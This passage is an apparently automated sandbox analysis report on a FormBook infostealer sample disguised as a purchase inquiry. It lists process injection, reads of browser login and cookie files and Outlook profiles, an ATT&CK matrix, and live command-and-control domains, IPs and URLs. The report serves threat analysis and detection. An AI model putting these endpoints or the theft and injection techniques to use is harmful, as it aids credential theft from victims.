              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtClose: Direct from: 0x77762B6C
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeSection loaded: NULL target: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 2040Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\fc.exeThread APC queued: target process: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeJump to behavior
              Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: mSWyWMUGFWJCYT.exe, 00000009.00000002.2507379425.0000000001751000.00000002.00000001.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000000.1587239579.0000000001751000.00000002.00000001.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000002.2507591280.00000000018B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: mSWyWMUGFWJCYT.exe, 00000009.00000002.2507379425.0000000001751000.00000002.00000001.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000000.1587239579.0000000001751000.00000002.00000001.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000002.2507591280.00000000018B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: mSWyWMUGFWJCYT.exe, 00000009.00000002.2507379425.0000000001751000.00000002.00000001.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000000.1587239579.0000000001751000.00000002.00000001.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000002.2507591280.00000000018B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
              Source: mSWyWMUGFWJCYT.exe, 00000009.00000002.2507379425.0000000001751000.00000002.00000001.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000000.1587239579.0000000001751000.00000002.00000001.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000002.2507591280.00000000018B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.CSZ inquiry for MH raw material.exe.e60000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1663788155.0000000001190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2508299421.0000000003880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1664457241.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.CSZ inquiry for MH raw material.exe.e60000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1663788155.0000000001190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2508299421.0000000003880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1664457241.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		312
              Process Injection              		2
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		312
              Process Injection              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Abuse Elevation Control Mechanism              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              CSZ inquiry for MH raw material.exe74%ReversingLabsWin32.Backdoor.FormBook
              CSZ inquiry for MH raw material.exe67%VirustotalBrowse
              CSZ inquiry for MH raw material.exe100%AviraTR/Crypt.XPACK.Gen
              CSZ inquiry for MH raw material.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.investshares.net/cf9p/0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/?ptH8A6=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgPqUeDekfARjRUucHmZ6H68xhcA6aT153Xsmr+pfOOQ7uAfOZkFusVC3&e4M=Tfa0_jE00%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/0%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/?e4M=Tfa0_jE0&ptH8A6=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwfh9UMCmV9sv26tPWfSpL+RY4eJUJjwe/OEwjvV/FXoNhKuiWFV4ToBJ0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/?ptH8A6=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvRsCKtwsoTwtBRtOzLnbykrUVFpky7P5wYQuQ25a4dovtn3QHJaU3t1x&e4M=Tfa0_jE00%Avira URL Cloudsafe
              http://www.gayhxi.info/k2i2/?e4M=Tfa0_jE0&ptH8A6=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWnvTNq0buLUzVN+8DkO+pt5xnDU0gcgj2/kU9yS2vcWWPXQj2rjTuuLx100%Avira URL Cloudmalware
              http://www.promocao.info/zaz4/?ptH8A6=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvD59p2x79JGj8+Yz9VVRMgvDTsTucbTnzBoQzXIZ9OSEU5EpWd7+rj1U&e4M=Tfa0_jE00%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              promocao.info
              		84.32.84.32
              		truetrue
                		unknown
                www.grimbo.boats
                		104.21.18.171
                		truefalse
                  		high
                  www.lonfor.website
                  		199.192.21.169
                  		truefalse
                    		high
                    www.gayhxi.info
                    		47.83.1.90
                    		truefalse
                      		high
                      www.investshares.net
                      		154.197.162.239
                      		truefalse
                        		high
                        zcdn.8383dns.com
                        		134.122.135.48
                        		truefalse
                          		high
                          www.promocao.info
                          		unknown
                          		unknownfalse
                            		unknown
                            www.44756.pizza
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.promocao.info/zaz4/?ptH8A6=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvD59p2x79JGj8+Yz9VVRMgvDTsTucbTnzBoQzXIZ9OSEU5EpWd7+rj1U&e4M=Tfa0_jE0true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.grimbo.boats/kxtt/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.lonfor.website/bowc/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.44756.pizza/a59t/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.44756.pizza/a59t/?ptH8A6=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgPqUeDekfARjRUucHmZ6H68xhcA6aT153Xsmr+pfOOQ7uAfOZkFusVC3&e4M=Tfa0_jE0true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.lonfor.website/bowc/?e4M=Tfa0_jE0&ptH8A6=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwfh9UMCmV9sv26tPWfSpL+RY4eJUJjwe/OEwjvV/FXoNhKuiWFV4ToBJtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.gayhxi.info/k2i2/?e4M=Tfa0_jE0&ptH8A6=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWnvTNq0buLUzVN+8DkO+pt5xnDU0gcgj2/kU9yS2vcWWPXQj2rjTuuLxtrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.grimbo.boats/kxtt/?ptH8A6=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXvRsCKtwsoTwtBRtOzLnbykrUVFpky7P5wYQuQ25a4dovtn3QHJaU3t1x&e4M=Tfa0_jE0true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.investshares.net/cf9p/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.promocao.info/zaz4/true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabfc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.ecosia.org/newtab/fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 0000000A.00000002.2510596782.000000000800A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              154.197.162.239
                                              		www.investshares.netSeychelles
                                              		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                              104.21.18.171
                                              		www.grimbo.boatsUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              199.192.21.169
                                              		www.lonfor.websiteUnited States
                                              		22612NAMECHEAP-NETUSfalse
                                              47.83.1.90
                                              		www.gayhxi.infoUnited States
                                              		3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                              84.32.84.32
                                              		promocao.infoLithuania
                                              		33922NTT-LT-ASLTtrue
                                              134.122.135.48
                                              		zcdn.8383dns.comUnited States
                                              		64050BCPL-SGBGPNETGlobalASNSGfalse

                                              General Information

                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1590081
                                              Start date and time:2025-01-13 15:10:08 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 36s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:CSZ inquiry for MH raw material.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@5/1@6/6
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 96%
                                              • Number of executed functions: 14
                                              • Number of non-executed functions: 329
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target mSWyWMUGFWJCYT.exe, PID 2340 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              09:12:21API Interceptor1340613x Sleep call for process: fc.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              154.197.162.239CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                              • www.investshares.net/cf9p/
                                              PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                              • www.investshares.net/cf9p/
                                              Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                              • www.investshares.net/cf9p/
                                              Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                              • www.investshares.net/cf9p/
                                              inv#12180.exeGet hashmaliciousFormBookBrowse
                                              • www.investshares.net/cf9p/
                                              104.21.18.171Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                              • www.grimbo.boats/mjs1/
                                              smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                              • www.grimbo.boats/ej4l/
                                              PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                              • www.grimbo.boats/kxtt/
                                              Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                              • www.grimbo.boats/kxtt/
                                              Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                              • www.grimbo.boats/kxtt/
                                              SecuriteInfo.com.Variant.Tedy.130342.18814.exeGet hashmaliciousFormBookBrowse
                                              • www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx
                                              199.192.21.169MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                              • www.bokus.site/qps0/
                                              Payment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                              • www.sesanu.xyz/rf25/
                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                              • www.lonfor.website/bowc/
                                              plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                              • www.astrafusion.xyz/pcck/
                                              QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                              • www.bokus.site/qps0/
                                              QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                              • www.bokus.site/qps0/
                                              QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                              • www.bokus.site/qps0/
                                              ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.solidf.xyz/stho/
                                              DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                              • www.lonfor.website/stiu/
                                              PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                              • www.lonfor.website/bowc/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.grimbo.boatsPayment Notification Confirmation Documents 09_01_2025 Paper bill.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.18.171
                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.182.198
                                              gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.182.198
                                              FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.18.171
                                              smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.18.171
                                              PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.18.171
                                              rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.182.198
                                              Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.18.171
                                              Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.18.171
                                              inv#12180.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.182.198
                                              www.lonfor.websiteCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.21.169
                                              DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.21.169
                                              PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.21.169
                                              Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.21.169
                                              Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.21.169
                                              inv#12180.exeGet hashmaliciousFormBookBrowse
                                              • 199.192.21.169
                                              www.gayhxi.infoCSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90
                                              PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90
                                              Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90
                                              Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90
                                              inv#12180.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90
                                              z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUStN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                              • 104.21.32.1
